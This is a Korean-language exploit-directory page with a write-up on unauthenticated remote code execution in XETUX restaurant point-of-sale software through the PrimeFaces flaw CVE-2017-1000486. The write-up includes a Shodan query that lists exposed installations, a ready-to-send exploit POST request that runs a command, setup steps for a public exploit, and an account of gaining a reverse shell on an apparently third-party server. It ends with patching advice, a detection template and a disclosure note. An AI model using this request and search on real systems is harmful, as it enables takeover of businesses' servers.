Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/jam620/primefaces
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubjam620/primefaces

primefaces

CVE-2017-1000486 익스플로잇

저장소 보기
32년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

테이블에서 코드로: 레스토랑 POS RCE 취약점을 통한 여행

이번 기회에 우리는 우연히 레스토랑 POS 애플리케이션 여러 곳에 존재하는 취약점을 발견했습니다 XETUX. 이는 레스토랑 모니터링 및 자동화 솔루션입니다. 파나마에서는 여러 레스토랑에서 널리 사용되는 도구입니다.

해당 취약점은 RCE(원격 코드 실행)로, 공격자가 인증 없이 코드를 실행하고 대상에서 권한을 획득할 수 있습니다.

2

1. 열거

Xetux 애플리케이션에 존재하는 라이브러리를 발견한 후, 해당 라이브러리는 PDF 생성을 담당하는 PrimeFaces라고 불립니다. 우리는 Shodan에서 검색을 수행하여 잠재적 대상을 식별하기로 결정했습니다.

root@kitploit:~
http.title:"@XETUX" country:PA

검색 결과 파나마에서 40개, 전 세계적으로 334개의 결과가 나왔습니다.

1

파나마에 있지 않은 대상 중 하나에서 취약점을 확인했습니다. 백엔드를 분석한 결과,

3

애플리케이션이 nt authority\system의 모든 권한으로 설치된 것을 확인할 수 있습니다. 이제 무슨 일이 일어나는지 설명하겠습니다:

애플리케이션은 Apache Tomcat을 서버로 사용하고, 백엔드에는 Java를 사용합니다. 애플리케이션은 PrimeFaces라는 타사 라이브러리 또는 플러그인을 사용하며, 문제가 있는 경로는 엔드포인트 javax.faces.resource/dynamiccontent.properties.xhtml입니다.

해당 라이브러리에 대해 검색한 결과 취약점을 발견했습니다. PrimeFaces는 다음과 같이 동적 콘텐츠를 로드합니다.

root@kitploit:~
/javax.faces.resource/dynamiccontent.properties.jsf?ln=primefaces&pfdrid=dY1NMdRjZ4sqkGAPrRzKkmxm5b1DSrlJ7VXTVU2i7gmrhtVAkmH7aR8cUk7h%2BTgl&forcereload=1523006610695&pfdrid_c=true

문제는 pdfid 매개변수에 있습니다.

pfdrid=dY1NMdRjZ4sqkGAPrRzKkmxm5b1DSrlJ7VXTVU2i7gmrhtVAkmH7aR8cUk7h%2BTgl

매개변수 값은 암호화되어 있으며 요청이 올바르게 복호화될지 확인할 방법이 없습니다. 불행히도 기본 키 값을 수정하지 않으면 기본 키 생성을 요청할 수 있습니다. 다행히도 우리에게는 수행된 모든 테스트에서 기본 키가 유지되었습니다.

마찬가지로 패딩 오라클 공격(Padding Oracle Attack)을 수행하고 Padbuster 도구를 사용하여 키를 얻을 수 있습니다. 다음은 요청입니다.

root@kitploit:~
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: ip:9090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 1643

pfdrt=sc&ln=primefaces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel%2Fv4YXvibdOn52ow4M6lDaKd9Gb8JdQqbACZNWVZpVS%2B3sX1Hoizouty1mYYT4yJsKPnUZ0LUHDvN0GB5YLgX1PkNY%2B1ZQ%2FnOSg5J1LDyzAjBheAxLDODIVcHkmJ6hnJsQ0YQ8bMU5%2B%2BTqeD4BGqCZMDjP%2BZQvveiUhxsUC%2F%2BtPqnOgFSBV8TBjDSPNmVoQ9YcKTGelKuJjS2kCXHjcyz7PcQksSW6UUmKu9RhJ%2Bx3Mnx6j56eroVPWnM2vdYRt5An6cLo1YPXu9uqriyg1wgm%2F7xYP%2FUwP1q8wfVeyM4fOw2xJzP6i1q4VLHLXi0VYHAIgaPrZ8gH8XH4X2Kq6ewyrJ62QxBF5dtE3tvLAL5tpGxqek5VW%2BhZFe9ePu0n5tLxWmqgqni8bKGbGrGu4IhXhCJhBxyelLQzPGLCfqmiQwYX5Ime9EHj1k5eoWQzH8jb3kQfFJ0exVprGCfXKGfHyfKfLEOd86anNsiQeNavNL7cDKV0yMbz52n6WLQrCAyzulE8kBCZPNGIUJh24npbeaHTaCjHRDtI7aIPHAIhuMWn7Ef5TU9DcXjdJvZqrItJoCDrtxMFfDhb0hpNQ2ise%2BbYIYzUDkUtdRV%2BjCGNI9kbPG5QPhAqp%2FJBhQ%2BXsqIhsu4LfkGbt51STsbVQZvoNaNyukOBL5IDTfNY6wS5bPSOKGuFjsQq0Xoadx1t3fc1YA9pm%2FEWgyR5DdKtmmxG93QqNhZf2RlPRJ5Z3jQAtdxw%2BxBgj6mLY2bEJUZn4R75UWnvLO6JM918jHdfPZELAxOCrzk5MNuoNxsWreDM7e2GX2iTUpfzNILoGaBY5wDnRw46ATxhx6Q%2FEba5MU7vNX1VtGFfHd2cDM5cpSGOlmOMl8qzxYk1R%2BA2eBUMEl8tFa55uwr19mW9VvWatD8orEb1RmByeIFyUeq6xLszczsB5Sy85Y1KPNvjmbTKu0LryGUc3U8VQ7AudToBsIo9ofMUJAwELNASNfLV0fZvUWi0GjoonpBq5jqSrRHuERB1%2BDW2kR6XmnuDdZMt9xdd1BGi1AM3As0KwSetNq6Ezm2fnjpW877buqsB%2BczxMtn6Yt6l88NRYaMHrwuY7s4IMNEBEazc0IBUNF30PH%2B3eIqRZdkimo980HBzVW4SXHnCMST65%2FTaIcy6%2FOXQqNjpMh7DDEQIvDjnMYMyBILCOCSDS4T3JQzgc%2BVhgT97imje%2FKWibF70yMQesNzOCEkaZbKoHz498sqKIDRIHiVEhTZlwdP29sUwt1uqNEV%2F35yQ%2BO8DLt0b%2BjqBECHJzI1IhGvSUWJW37TAgUEnJWpjI9R1hT88614GsVDG0UYv0u8YyS0chh0RryV3BXotoSkSkVGShIT4h0s51Qjswp0luewLtNuVyC5FvHvWiHLzbAArNnmM7k%2FGdCn3jLe9PeJp7yqDzzBBMN9kymtJdlm7c5XnlOv%2BP7wIJbP0i4%2BQF%2BPXw5ePKwSwQ9v8rTQ%3D%3D&cmd=whoami
2. 리버스 셸

앞서 언급했듯이 RCE를 포함하는 라이브러리는 PrimeFaces이며, 공개된 익스플로잇이 있습니다 CVE-2017-1000486.

익스플로잇을 다운로드하여 취약점을 테스트해 보겠습니다.

root@kitploit:~
git clone https://github.com/pimps/CVE-2017-1000486.git
cd CVE-2017-1000486
pip3 install -r requirements.txt

익스플로잇을 실행합니다.

4

실행하면 키와 요청이 출력됩니다.

5

명령의 결과를 반환합니다.

6

이제 서버에 액세스하기 위해 리버스 셸을 획득하겠습니다:

7

3. 최종 고려 사항
  • 이 결함은 Xetux 소프트웨어에만 적용되는 것이 아니라 PrimeFaces 라이브러리에 있으며 MaxView Storage Manager 및 DOCBOX와 같은 다른 애플리케이션에서도 발견된다는 점을 강조하는 것이 중요합니다.
  • 취약점에 대한 수정 사항은 수년 전인 2017년에 나왔으며, PrimeFaces를 업데이트하는 것이 좋습니다.
  • 엔드포인트에 대한 액세스는 인증이 없으므로 누구나 요청을 할 수 있습니다. 따라서 요청이 유효한지 확인해야 합니다.
  • 언급된 애플리케이션 중 하나를 사용하는 경우, 취약한지 확인할 수 있는 Nuclei 템플릿 저장소를 공유합니다: https://gitlab.com/t0adsec/nuclei-templates
  • 책임감 있게 해당 국가의 앱 공급업체에 알렸지만, 현재까지 그들로부터 연락을 받지 못했습니다.
4. 참고 자료
  • XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行漏洞-CSDN博客. (s. f.). https://blog.csdn.net/holyxp/article/details/134402720
  • Gobysec. (s. f.). GobyVuls/GobyVuls-Document.md at master · gobysec/GobyVuls. GitHub. https://github.com/gobysec/GobyVuls/blob/master/GobyVuls-Document.md
  • Lindner, S. (2018, 26 abril). PrimeFaces Expression Language Remote Code Execution fix. illucIT Software GmbH. https://www.illucit.com/en/java-ee/primefaces-expression-language-remote-code-execution-fix
도구 다운로드